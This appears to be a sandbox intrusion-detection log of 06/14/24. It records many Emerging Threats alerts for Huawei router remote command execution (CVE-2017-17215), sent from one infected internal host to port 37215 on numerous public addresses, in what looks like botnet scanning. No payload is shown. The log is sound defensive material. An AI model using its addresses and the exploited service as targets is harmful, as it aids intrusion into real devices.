                                            06/14/24-10:44:24.915533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184237215192.168.2.14156.84.101.115
                                            06/14/24-10:44:33.134392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376637215192.168.2.14197.157.108.42
                                            06/14/24-10:43:39.791107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492837215192.168.2.14156.135.18.30
                                            06/14/24-10:43:56.243620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970837215192.168.2.14156.160.147.29
                                            06/14/24-10:43:50.071846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371237215192.168.2.1441.113.77.50
                                            06/14/24-10:44:18.761645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708837215192.168.2.14156.101.243.41
                                            06/14/24-10:43:41.849836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761037215192.168.2.14197.93.197.167
                                            06/14/24-10:43:50.113773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5823637215192.168.2.14197.150.11.155
                                            06/14/24-10:43:45.967603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001837215192.168.2.14197.83.255.142
                                            06/14/24-10:44:12.625094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783637215192.168.2.14197.84.4.55
                                            06/14/24-10:44:02.365590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478237215192.168.2.1441.97.202.97
                                            06/14/24-10:44:04.423356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3508637215192.168.2.1441.179.245.66
                                            06/14/24-10:44:33.150815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166037215192.168.2.14197.166.172.58
                                            06/14/24-10:43:54.199958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668037215192.168.2.14197.146.11.25
                                            06/14/24-10:43:50.075075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5273037215192.168.2.1441.149.226.107
                                            06/14/24-10:44:14.667980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693237215192.168.2.1441.210.111.231
                                            06/14/24-10:44:06.448974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697237215192.168.2.14197.218.197.139
                                            06/14/24-10:44:08.504570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938037215192.168.2.14197.78.49.23
                                            06/14/24-10:44:18.766314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312637215192.168.2.14156.147.113.230
                                            06/14/24-10:43:41.898097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4129237215192.168.2.14197.44.120.76
                                            06/14/24-10:43:50.072706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446637215192.168.2.14156.219.136.148
                                            06/14/24-10:44:06.451006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505037215192.168.2.14197.51.200.67
                                            06/14/24-10:43:36.703808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194637215192.168.2.14197.155.155.170
                                            06/14/24-10:44:14.668844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083837215192.168.2.14156.122.47.227
                                            06/14/24-10:44:24.915854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5122037215192.168.2.1441.171.109.34
                                            06/14/24-10:44:26.978347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133837215192.168.2.1441.44.126.87
                                            06/14/24-10:44:35.182278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984037215192.168.2.14156.170.16.84
                                            06/14/24-10:44:10.546973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4914237215192.168.2.14197.255.1.117
                                            06/14/24-10:43:37.763137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610637215192.168.2.1441.179.105.36
                                            06/14/24-10:43:50.074652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284237215192.168.2.1441.11.26.88
                                            06/14/24-10:43:34.661732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521037215192.168.2.1441.21.0.89
                                            06/14/24-10:43:52.147085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574237215192.168.2.14197.200.181.92
                                            06/14/24-10:44:24.942406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721237215192.168.2.14197.74.129.11
                                            06/14/24-10:43:37.762699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239837215192.168.2.14197.211.177.123
                                            06/14/24-10:43:58.276750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660637215192.168.2.1441.157.25.225
                                            06/14/24-10:44:14.683805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256437215192.168.2.1441.241.160.44
                                            06/14/24-10:44:26.980798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732837215192.168.2.14197.164.235.72
                                            06/14/24-10:43:41.912782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529237215192.168.2.14197.202.45.30
                                            06/14/24-10:44:16.733202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630437215192.168.2.14197.102.180.34
                                            06/14/24-10:44:00.322423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316837215192.168.2.14156.226.13.56
                                            06/14/24-10:44:20.831312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898237215192.168.2.14156.169.186.34
                                            06/14/24-10:43:39.791129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5979237215192.168.2.14197.202.174.54
                                            06/14/24-10:44:16.733245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213837215192.168.2.14197.47.55.176
                                            06/14/24-10:43:56.227336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831437215192.168.2.1441.253.196.85
                                            06/14/24-10:44:35.182014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835837215192.168.2.14156.254.168.76
                                            06/14/24-10:44:00.322197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134837215192.168.2.14197.37.196.19
                                            06/14/24-10:44:04.411672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084837215192.168.2.14156.180.229.206
                                            06/14/24-10:43:52.143624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322837215192.168.2.1441.129.198.146
                                            06/14/24-10:44:06.471629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3558237215192.168.2.1441.20.250.143
                                            06/14/24-10:44:18.777722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618637215192.168.2.14156.236.115.29
                                            06/14/24-10:44:33.134363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001837215192.168.2.14197.234.70.37
                                            06/14/24-10:44:22.861027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882237215192.168.2.14197.19.1.157
                                            06/14/24-10:44:06.471822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4762637215192.168.2.14197.231.239.9
                                            06/14/24-10:44:18.780042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046037215192.168.2.14156.66.76.105
                                            06/14/24-10:44:31.083970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407637215192.168.2.1441.9.206.170
                                            06/14/24-10:44:14.670170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4462037215192.168.2.14197.5.19.142
                                            06/14/24-10:43:56.253320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318037215192.168.2.14197.92.190.172
                                            06/14/24-10:44:04.407445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458637215192.168.2.14197.44.86.205
                                            06/14/24-10:44:31.053043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4864437215192.168.2.14197.184.100.208
                                            06/14/24-10:44:08.521462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4526437215192.168.2.14197.8.245.164
                                            06/14/24-10:44:24.915601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057237215192.168.2.14197.190.139.198
                                            06/14/24-10:44:12.641910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960837215192.168.2.1441.192.173.127
                                            06/14/24-10:44:12.614483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250437215192.168.2.14156.42.182.194
                                            06/14/24-10:43:43.972251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5749037215192.168.2.1441.193.240.234
                                            06/14/24-10:44:12.640527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076237215192.168.2.14156.235.120.200
                                            06/14/24-10:44:08.502884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115237215192.168.2.14156.93.50.53
                                            06/14/24-10:44:10.543503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917237215192.168.2.14197.110.187.27
                                            06/14/24-10:43:43.943929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5346837215192.168.2.14197.130.70.242
                                            06/14/24-10:44:29.025550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242837215192.168.2.14156.30.46.85
                                            06/14/24-10:44:18.779625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110037215192.168.2.14197.170.233.201
                                            06/14/24-10:43:41.846551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4576637215192.168.2.14197.221.114.154
                                            06/14/24-10:43:52.165011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362437215192.168.2.1441.23.127.171
                                            06/14/24-10:44:10.563271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570437215192.168.2.14197.59.233.158
                                            06/14/24-10:44:24.915263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385637215192.168.2.14197.24.43.15
                                            06/14/24-10:43:58.293414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501037215192.168.2.1441.236.194.208
                                            06/14/24-10:44:29.011062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4139437215192.168.2.14156.13.0.253
                                            06/14/24-10:44:04.423481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3708437215192.168.2.14156.108.69.27
                                            06/14/24-10:43:41.850205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925237215192.168.2.14156.39.27.172
                                            06/14/24-10:43:54.184012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308237215192.168.2.14156.232.228.134
                                            06/14/24-10:44:02.384498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082637215192.168.2.14197.52.107.16
                                            06/14/24-10:44:29.024623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603037215192.168.2.14197.229.76.227
                                            06/14/24-10:44:33.132586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768437215192.168.2.14197.192.243.80
                                            06/14/24-10:44:14.681507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034237215192.168.2.1441.76.200.171
                                            06/14/24-10:44:35.179576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5018437215192.168.2.14197.31.82.162
                                            06/14/24-10:43:39.807828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851037215192.168.2.14156.158.69.102
                                            06/14/24-10:44:06.452952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863837215192.168.2.14197.243.68.79
                                            06/14/24-10:44:29.023358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906237215192.168.2.1441.44.106.18
                                            06/14/24-10:44:29.027772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494037215192.168.2.1441.13.145.200
                                            06/14/24-10:44:12.614170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774037215192.168.2.1441.107.247.79
                                            06/14/24-10:44:33.152837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986637215192.168.2.14197.235.174.63
                                            06/14/24-10:44:08.520113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211637215192.168.2.14156.39.175.48
                                            06/14/24-10:44:16.732701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864037215192.168.2.14197.206.203.108
                                            06/14/24-10:44:10.547503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493637215192.168.2.14156.190.77.28
                                            06/14/24-10:43:50.075019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080437215192.168.2.14197.78.168.38
                                            06/14/24-10:44:27.000189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046837215192.168.2.14197.123.55.129
                                            06/14/24-10:43:36.726373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627037215192.168.2.14197.157.48.40
                                            06/14/24-10:43:54.203273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941637215192.168.2.14156.129.28.1
                                            06/14/24-10:43:48.016256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106637215192.168.2.14156.234.27.219
                                            06/14/24-10:44:08.520321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5147837215192.168.2.14197.69.128.245
                                            06/14/24-10:44:29.025431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478637215192.168.2.1441.194.7.24
                                            06/14/24-10:44:18.763326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778437215192.168.2.14197.119.25.252
                                            06/14/24-10:44:24.917125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681637215192.168.2.14197.1.78.2
                                            06/14/24-10:44:14.684621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3803637215192.168.2.14156.49.246.201
                                            06/14/24-10:43:48.028056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5337237215192.168.2.1441.138.27.150
                                            06/14/24-10:43:34.662099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3774837215192.168.2.1441.229.62.31
                                            06/14/24-10:44:10.545445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946437215192.168.2.14156.179.109.221
                                            06/14/24-10:44:14.672446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848037215192.168.2.14197.104.237.231
                                            06/14/24-10:44:18.777754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000637215192.168.2.14197.129.207.119
                                            06/14/24-10:43:54.184370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4779037215192.168.2.14197.140.145.219
                                            06/14/24-10:44:08.504116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025437215192.168.2.1441.56.40.28
                                            06/14/24-10:44:02.364549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5278237215192.168.2.14156.51.83.129
                                            06/14/24-10:43:58.273706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748437215192.168.2.1441.77.131.47
                                            06/14/24-10:43:54.184115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797437215192.168.2.14156.153.97.115
                                            06/14/24-10:43:48.028201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513637215192.168.2.1441.198.105.153
                                            06/14/24-10:44:31.082305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731237215192.168.2.1441.231.78.123
                                            06/14/24-10:43:41.897085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585437215192.168.2.14197.87.208.213
                                            06/14/24-10:44:10.545999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4124637215192.168.2.14197.236.117.128
                                            06/14/24-10:44:14.672102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3301237215192.168.2.14197.221.91.69
                                            06/14/24-10:43:36.704863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695837215192.168.2.14156.13.229.147
                                            06/14/24-10:43:52.163912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505437215192.168.2.14156.193.165.94
                                            06/14/24-10:43:58.294216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032237215192.168.2.14156.181.87.126
                                            06/14/24-10:44:16.717324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5007237215192.168.2.14197.238.118.203
                                            06/14/24-10:43:37.763452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5409437215192.168.2.1441.195.168.65
                                            06/14/24-10:43:36.726207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284437215192.168.2.14156.179.254.134
                                            06/14/24-10:43:56.254018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284637215192.168.2.1441.235.140.178
                                            06/14/24-10:44:26.980837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661637215192.168.2.14197.64.130.9
                                            06/14/24-10:44:14.672196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090237215192.168.2.14197.185.140.192
                                            06/14/24-10:44:06.449449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247837215192.168.2.14156.3.144.27
                                            06/14/24-10:44:04.420350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5701237215192.168.2.14156.87.239.189
                                            06/14/24-10:43:36.727456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5607437215192.168.2.14197.120.234.106
                                            06/14/24-10:44:31.091579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3635837215192.168.2.1441.233.134.244
                                            06/14/24-10:43:52.146794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025037215192.168.2.1441.190.55.4
                                            06/14/24-10:44:22.859093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689637215192.168.2.14156.188.17.135
                                            06/14/24-10:44:31.091491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443637215192.168.2.14156.156.50.209
                                            06/14/24-10:43:45.969316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528637215192.168.2.1441.173.204.169
                                            06/14/24-10:44:04.422200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312637215192.168.2.1441.52.95.69
                                            06/14/24-10:43:34.661100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318637215192.168.2.1441.68.188.191
                                            06/14/24-10:44:08.519183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5943237215192.168.2.1441.170.246.219
                                            06/14/24-10:44:20.804759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048037215192.168.2.14156.212.241.204
                                            06/14/24-10:44:18.775538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570637215192.168.2.14156.91.219.234
                                            06/14/24-10:44:31.054989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370037215192.168.2.14156.203.142.55
                                            06/14/24-10:44:16.715825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626437215192.168.2.14197.47.115.219
                                            06/14/24-10:43:41.850178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233237215192.168.2.1441.77.212.152
                                            06/14/24-10:44:14.686757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905437215192.168.2.14197.242.110.18
                                            06/14/24-10:44:08.501825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3988237215192.168.2.14156.80.42.59
                                            06/14/24-10:44:16.714835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899037215192.168.2.14156.28.133.212
                                            06/14/24-10:44:20.831577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692837215192.168.2.1441.35.67.161
                                            06/14/24-10:44:02.384524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5557837215192.168.2.14197.125.219.193
                                            06/14/24-10:44:24.913468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849837215192.168.2.1441.254.171.189
                                            06/14/24-10:43:43.943362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4661637215192.168.2.1441.169.21.173
                                            06/14/24-10:43:50.112201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676437215192.168.2.1441.184.248.175
                                            06/14/24-10:44:20.830071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4841437215192.168.2.1441.1.171.127
                                            06/14/24-10:43:54.198638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731237215192.168.2.1441.166.185.34
                                            06/14/24-10:44:22.881036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125437215192.168.2.14156.156.192.116
                                            06/14/24-10:43:34.662326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764837215192.168.2.1441.31.120.95
                                            06/14/24-10:44:08.502528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994037215192.168.2.1441.92.214.30
                                            06/14/24-10:44:10.581705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4040237215192.168.2.14197.102.24.113
                                            06/14/24-10:43:50.073372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893837215192.168.2.1441.11.248.117
                                            06/14/24-10:44:33.151034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5948237215192.168.2.14197.120.186.244
                                            06/14/24-10:44:08.505133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052637215192.168.2.1441.87.120.164
                                            06/14/24-10:44:14.672808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4406037215192.168.2.14197.2.80.116
                                            06/14/24-10:44:24.916665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790437215192.168.2.1441.67.197.10
                                            06/14/24-10:44:29.025523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3825637215192.168.2.14197.5.144.123
                                            06/14/24-10:44:35.177576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654837215192.168.2.14197.238.208.40
                                            06/14/24-10:43:45.968955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034237215192.168.2.14197.205.26.172
                                            06/14/24-10:44:00.341755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4489837215192.168.2.14156.220.101.207
                                            06/14/24-10:44:00.344075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369037215192.168.2.1441.49.69.73
                                            06/14/24-10:43:52.146377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370637215192.168.2.1441.115.76.156
                                            06/14/24-10:43:36.729257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658437215192.168.2.14197.171.150.86
                                            06/14/24-10:44:00.326017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999037215192.168.2.1441.97.228.114
                                            06/14/24-10:43:56.225967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510837215192.168.2.14156.195.103.24
                                            06/14/24-10:44:02.385739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585637215192.168.2.14156.166.152.184
                                            06/14/24-10:44:02.368771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133037215192.168.2.14156.69.237.49
                                            06/14/24-10:44:35.183357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615437215192.168.2.1441.90.150.180
                                            06/14/24-10:44:06.453054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098437215192.168.2.14156.168.5.189
                                            06/14/24-10:44:24.917498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3823437215192.168.2.14197.172.20.138
                                            06/14/24-10:43:39.791047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806837215192.168.2.14156.147.47.111
                                            06/14/24-10:43:52.163621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887237215192.168.2.14156.181.63.184
                                            06/14/24-10:43:43.942993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5010437215192.168.2.14197.106.167.170
                                            06/14/24-10:43:48.042534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5448637215192.168.2.14197.163.15.209
                                            06/14/24-10:43:58.289664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715037215192.168.2.1441.184.213.104
                                            06/14/24-10:43:43.943847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004037215192.168.2.1441.36.199.241
                                            06/14/24-10:43:54.186314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480437215192.168.2.1441.57.166.242
                                            06/14/24-10:44:33.150486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437837215192.168.2.14197.181.25.249
                                            06/14/24-10:43:43.942825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354637215192.168.2.14197.112.21.75
                                            06/14/24-10:43:48.018177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695837215192.168.2.14156.212.129.255
                                            06/14/24-10:44:02.367706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3494637215192.168.2.14156.126.146.199
                                            06/14/24-10:44:29.023471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762837215192.168.2.14156.168.27.155
